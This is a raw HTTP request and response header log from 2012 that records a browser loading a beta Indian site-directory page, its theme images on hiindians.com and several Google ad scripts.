P3P: policyref=&quot;http://info.yahoo.com/w3c/p3p.xml&quot;, CP=&quot;CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV&quot;
Last-Modified: Thu, 8 Nov 2012 01:44:36 GMT
Expires: Thu, 8 Nov 2012 01:45:36 GMT
Content-Length: 5444
Connection: close
Cache-Control: private
GET /beta/themes/kosmos/images/mn_get_rated.gif HTTP/1.1

Host: www.hiindians.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: fc=fcVal=3791201978339930024; domain=hiindians.com; expires=Fri, 01-Jan-2038 07:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 08 Nov 2012 01:44:35 GMT
Content-Length: 689
Age: 0
Connection: keep-alive
GET /beta/themes/kosmos/images/mn_update_a_listing.gif HTTP/1.1

Host: www.hiindians.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: fc=fcVal=4471270048851816448; domain=hiindians.com; expires=Fri, 01-Jan-2038 07:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 08 Nov 2012 01:44:35 GMT
Content-Length: 8847
Age: 0
Connection: keep-alive
GET /beta/themes/kosmos/images/mn_upgrade_a_listing.gif HTTP/1.1

Host: www.hiindians.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: fc=fcVal=3099028721068146688; domain=hiindians.com; expires=Fri, 01-Jan-2038 07:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 08 Nov 2012 01:44:35 GMT
Content-Length: 8848
Age: 0
Connection: keep-alive
GET /beta/themes/kosmos/images/template_10.gif HTTP/1.1

Host: www.hiindians.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: fc=fcVal=597302064025840528; domain=hiindians.com; expires=Fri, 01-Jan-2038 07:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 08 Nov 2012 01:44:36 GMT
Content-Length: 8849
Age: 0
Connection: keep-alive
GET /beta/themes/kosmos/images/template_12.gif HTTP/1.1

Host: www.hiindians.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: fc=fcVal=4404914057732281440; domain=hiindians.com; expires=Fri, 01-Jan-2038 07:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 08 Nov 2012 01:44:35 GMT
Content-Length: 689
Age: 0
Connection: keep-alive
GET /themes/kosmos/images/template_24.gif HTTP/1.1

Host: www.hiindians.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: fc=fcVal=7345621827002802176; domain=hiindians.com; expires=Fri, 01-Jan-2038 07:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 08 Nov 2012 01:44:36 GMT
Content-Length: 8845
Age: 0
Connection: keep-alive
GET /beta/themes/kosmos/images/template_24.gif HTTP/1.1

Host: www.hiindians.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: fc=fcVal=2189819672561599888; domain=hiindians.com; expires=Fri, 01-Jan-2038 07:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 08 Nov 2012 01:44:35 GMT
Content-Length: 8838
Age: 0
Connection: keep-alive
GET /beta/themes/kosmos/images/pr/9.gif HTTP/1.1

Host: www.hiindians.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: fc=fcVal=1595102866617116672; domain=hiindians.com; expires=Fri, 01-Jan-2038 07:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 08 Nov 2012 01:44:35 GMT
Content-Length: 8838
Age: 0
Connection: keep-alive
GET /beta/themes/kosmos/images/pr/8.gif HTTP/1.1

Host: www.hiindians.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: fc=fcVal=6677002912240287744; domain=hiindians.com; expires=Fri, 01-Jan-2038 07:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 08 Nov 2012 01:44:35 GMT
Content-Length: 8844
Age: 0
Connection: keep-alive
GET /beta/themes/kosmos/images/pr/7.gif HTTP/1.1

Host: www.hiindians.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: fc=fcVal=473126413600108544; domain=hiindians.com; expires=Fri, 01-Jan-2038 07:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 08 Nov 2012 01:44:36 GMT
Content-Length: 8840
Age: 0
Connection: keep-alive
GET /pagead/expansion_embed.js HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
P3P: policyref=&quot;http://www.googleadservices.com/pagead/p3p.xml&quot;, CP=&quot;NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC&quot;
Etag: 2372832783343406230
Date: Wed, 07 Nov 2012 20:35:03 GMT
Expires: Thu, 08 Nov 2012 20:35:03 GMT
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Content-Encoding: gzip
Server: cafe
Content-Length: 25450
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 18573
GET /beta/themes/kosmos/images/pr/6.gif HTTP/1.1

Host: www.hiindians.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: fc=fcVal=4348791460929238992; domain=hiindians.com; expires=Fri, 01-Jan-2038 07:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 08 Nov 2012 01:44:35 GMT
Content-Length: 8842
Age: 0
Connection: keep-alive
GET /beta/themes/kosmos/images/pr/5.gif HTTP/1.1

Host: www.hiindians.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: fc=fcVal=6371485076054762264; domain=hiindians.com; expires=Fri, 01-Jan-2038 07:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 08 Nov 2012 01:44:36 GMT
Content-Length: 8841
Age: 0
Connection: keep-alive
GET /beta/captcha.php?x HTTP/1.1

Host: www.hiindians.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: fc=fcVal=223932248865908440; domain=hiindians.com; expires=Fri, 01-Jan-2038 07:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 08 Nov 2012 01:44:35 GMT
Content-Length: 8839
Age: 0
Connection: keep-alive
GET /beta/themes/kosmos/images/folder.gif HTTP/1.1

Host: www.hiindians.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: fc=fcVal=1999045232951553088; domain=hiindians.com; expires=Fri, 01-Jan-2038 07:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 08 Nov 2012 01:44:35 GMT
Content-Length: 8847
Age: 0
Connection: keep-alive
GET /pagead/ads?client=ca-pub-8412828530142307&output=html&h=15&slotname=2367292824&w=468&lmt=1352339075&flash=10.0.45&url=http%3A%2F%2Fwww.indiansites.in%2Fbeta%2F&dt=1352339076404&bpp=14&shv=r20121031&jsv=r20110914&correlator=1352339076716&frm=20&adk=1391301316&ga_vid=387901256.1352339077&ga_sid=1352339077&ga_hid=1874162876&ga_fc=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&dff=serif&dfs=16&adx=196&ady=316&biw=1159&bih=778&oid=3&fu=0&ifi=1&dtd=461&xpc=eQPNEDLsfI&p=http%3A//www.indiansites.in HTTP/1.1

Host: googleads.g.doubleclick.net
GET /pagead/ads?client=ca-pub-8412828530142307&amp;output=html&amp;h=15&amp;slotname=2367292824&amp;w=468&amp;lmt=1352339075&amp;flash=10.0.45&amp;url=http%3A%2F%2Fwww.indiansites.in%2Fbeta%2F&amp;dt=1352339076404&amp;bpp=14&amp;shv=r20121031&amp;jsv=r20110914&amp;correlator=1352339076716&amp;frm=20&amp;adk=1391301316&amp;ga_vid=387901256.1352339077&amp;ga_sid=1352339077&amp;ga_hid=1874162876&amp;ga_fc=0&amp;u_tz=60&amp;u_his=1&amp;u_java=1&amp;u_h=885&amp;u_w=1176&amp;u_ah=855&amp;u_aw=1176&amp;u_cd=24&amp;u_nplug=8&amp;u_nmime=54&amp;dff=serif&amp;dfs=16&amp;adx=196&amp;ady=316&amp;biw=1159&amp;bih=778&amp;oid=3&amp;fu=0&amp;ifi=1&amp;dtd=461&amp;xpc=eQPNEDLsfI&amp;p=http%3A//www.indiansites.in HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 403 Forbidden

Content-Type: text/html; charset=UTF-8
P3P: policyref=&quot;http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml&quot;, CP=&quot;CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR&quot;
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Date: Thu, 08 Nov 2012 01:44:36 GMT
Server: cafe
Cache-Control: private
Content-Length: 82
X-XSS-Protection: 1; mode=block
GET /beta/themes/kosmos/images/template_01.gif HTTP/1.1

Host: www.hiindians.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
Cookie: fc=fcVal=6106880429970206720
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 08 Nov 2012 01:44:35 GMT
Content-Length: 8837
Age: 0
Connection: keep-alive
GET /beta/themes/kosmos/images/mn_new_listings.gif HTTP/1.1

Host: www.hiindians.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
Cookie: fc=fcVal=495709789479985152
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 08 Nov 2012 01:44:36 GMT
Content-Length: 8835
Age: 0
Connection: keep-alive
GET /beta/themes/kosmos/images/template_13.gif HTTP/1.1

Host: www.hiindians.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
Cookie: fc=fcVal=495709789479985152
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 08 Nov 2012 01:44:36 GMT
Content-Length: 8840
Age: 0
Connection: keep-alive
GET /pagead/osd.js HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
If-None-Match: 13350759849962699205
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
P3P: policyref=&quot;http://www.googleadservices.com/pagead/p3p.xml&quot;, CP=&quot;NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC&quot;
Etag: 6549576333968007708
Date: Thu, 08 Nov 2012 01:35:04 GMT
Expires: Thu, 08 Nov 2012 02:35:04 GMT
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Content-Encoding: gzip
Server: cafe
Content-Length: 5986
X-XSS-Protection: 1; mode=block
Age: 572
Cache-Control: public, max-age=3600
GET /beta/themes/kosmos/images/new.gif HTTP/1.1

Host: www.hiindians.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
Cookie: fc=fcVal=9064846845994303832
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 08 Nov 2012 01:44:36 GMT
Content-Length: 8835
Age: 0
Connection: keep-alive
GET /image.aspx?url=http://timesofindia.indiatimes.com/ HTTP/1.1

Host: open.thumbshots.org

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Cache-Control: public, max-age=604800, s-maxage=604800
Content-Length: 3740
Expires: Thu, 15 Nov 2012 01:44:43 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 08 Nov 2012 01:44:43 GMT
GET /gampad/google_ads.js HTTP/1.1

Host: partner.googleadservices.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
P3P: policyref=&quot;http://www.googleadservices.com/pagead/p3p.xml&quot;, CP=&quot;NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC&quot;
Etag: 10595536884257248802
Date: Thu, 08 Nov 2012 01:36:03 GMT
Expires: Thu, 08 Nov 2012 02:36:03 GMT
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Content-Encoding: gzip
Server: cafe
Content-Length: 16721
X-XSS-Protection: 1; mode=block
Age: 514
Cache-Control: public, max-age=3600
GET /beta/themes/kosmos/images/rss.gif HTTP/1.1

Host: www.hiindians.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
Cookie: fc=fcVal=9064846845994303832
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 08 Nov 2012 01:44:35 GMT
Content-Length: 8838
Age: 0
Connection: keep-alive
GET /themes/kosmos/images/template_23.gif HTTP/1.1

Host: www.hiindians.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
Cookie: fc=fcVal=7015792487363104768
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 08 Nov 2012 01:44:35 GMT
Content-Length: 8832
Age: 0
Connection: keep-alive
GET /beta/themes/kosmos/images/template_23.gif HTTP/1.1

Host: www.hiindians.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
Cookie: fc=fcVal=7015792487363104768
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 08 Nov 2012 01:44:35 GMT
Content-Length: 8834
Age: 0
Connection: keep-alive
GET /beta/themes/kosmos/images/template_26.gif HTTP/1.1

Host: www.hiindians.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
Cookie: fc=fcVal=6371485076054762264
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 08 Nov 2012 01:44:36 GMT
Content-Length: 8830
Age: 0
Connection: keep-alive
GET /pagead/ads?client=ca-pub-8412828530142307&output=html&h=15&slotname=2367292824&w=468&lmt=1352339075&flash=10.0.45&url=http%3A%2F%2Fwww.indiansites.in%2Fbeta%2F&dt=1352339076454&bpp=4&shv=r20121031&jsv=r20110914&prev_slotnames=2367292824&correlator=1352339076716&frm=20&adk=1391301316&ga_vid=387901256.1352339077&ga_sid=1352339077&ga_hid=1874162876&ga_fc=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&dff=serif&dfs=16&adx=176&ady=321&biw=1159&bih=778&oid=3&fu=0&ifi=2&dtd=743&xpc=c60Sk3157Q&p=http%3A//www.indiansites.in HTTP/1.1

Host: googleads.g.doubleclick.net
